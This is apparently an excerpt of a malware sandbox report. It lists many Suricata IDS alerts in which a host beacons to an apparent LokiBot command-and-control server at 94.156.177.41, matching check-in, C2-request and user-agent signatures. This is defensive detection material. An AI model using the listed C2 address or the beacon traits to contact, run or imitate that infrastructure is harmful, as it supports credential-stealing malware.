                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49736 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51232 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51232 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51232 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49728 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49725 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49728 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49728 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49726 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49728 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51246 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49725 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49731 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49726 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51257 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51257 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49722 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49726 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49722 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51257 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49706 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51242 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51242 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51242 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49742 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49742 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49742 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51242 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51242 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51257 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51257 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51232 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51232 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49715 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51236 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51346 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49715 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51346 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49715 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51346 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51258 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49742 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51258 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49742 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51258 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49732 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49732 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51395 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51346 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51346 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49731 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51388 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49715 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51388 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51388 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51395 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51395 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51258 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51258 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51388 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51388 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51395 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51395 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49715 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51252 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51321 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51321 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51321 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51262 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51255 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51255 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51255 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51321 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51321 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51255 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51255 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51254 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51254 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51254 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49732 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51262 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51262 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51254 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51254 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49732 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49732 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51262 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51262 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51260 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51260 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51260 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51252 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51260 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51252 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51260 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49744 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49744 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49744 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49744 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49744 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51459 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51459 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51459 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51250 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51250 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49722 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51250 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51459 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51459 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51250 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49722 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51236 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49722 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51236 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51236 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51236 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51474 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51474 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51474 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51474 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51474 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51233 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51406 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51233 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51233 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51406 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51406 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51233 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51233 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51497 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51497 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51497 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51406 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51252 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51406 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51252 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51433 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51433 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51433 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51433 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51497 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51433 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51497 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51248 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51248 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51248 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49748 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49748 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51244 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51248 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49748 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51244 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49750 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51244 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49750 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49750 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51230 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51230 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51230 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51446 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51446 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51446 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49748 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49748 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49750 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49750 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49728 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51230 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51230 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51244 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51244 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51446 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51248 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51446 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51247 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51247 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51247 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51264 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51264 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51264 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51247 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51247 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51521 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51521 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51235 -> 94.156.177.41:80
